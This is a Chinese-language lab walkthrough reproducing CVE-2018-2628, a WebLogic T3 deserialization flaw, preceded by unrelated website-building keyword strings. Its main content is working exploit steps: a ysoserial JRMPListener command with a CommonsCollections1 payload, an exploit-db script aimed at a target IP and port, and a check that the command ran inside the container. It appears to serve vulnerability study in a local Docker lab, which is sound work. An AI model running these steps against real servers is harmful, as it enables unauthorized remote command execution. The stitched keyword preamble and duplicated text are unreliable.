电子商务网站建设结论,个人博客网站备案吗,网站开发大公司需要资格证吗,做网站的技术员Oracle 2018年4月补丁中#xff0c;修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞#xff08;CVE-2018-2628#xff09;#xff0c;该漏洞通过t3协议触发#xff0c;可导致未授权的用户在远程服务器执行任意命令。
访问http://your-ip:7001/consol…Oracle 2018年4月补丁中修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞CVE-2018-2628该漏洞通过t3协议触发可导致未授权的用户在远程服务器执行任意命令。
访问http://your-ip:7001/console初始化整个环境。 漏洞复现
首先下载ysoserial并启动一个JRMP Server
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 touch /tmp/success其中[command]即为我想执行的命令而[listen port]是JRMP Server监听的端口。然后使用[exploit.py](https://www.exploit-db.com/exploits/44553)脚本向目标Weblogichttp://your-ip:7001发送数据包python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]python2 exp.py 192.168.188.139 7001 /home/kali/Desktop/ysoserial-all.jar 192.168.188.139 1099 JRMPClient
其中[victim ip]和[victim port]是目标weblogic的IP和端口[path to ysoserial]是本地ysoserial的路径[JRMPListener ip]和[JRMPListener port]第一步中启动JRMP Server的IP地址和端口。[JRMPClient]是执行JRMPClient的类可选的值是JRMPClient或JRMPClient2。
exploit.py执行完成后执行docker compose exec weblogic bash进入容器中可见/tmp/success已成功创建。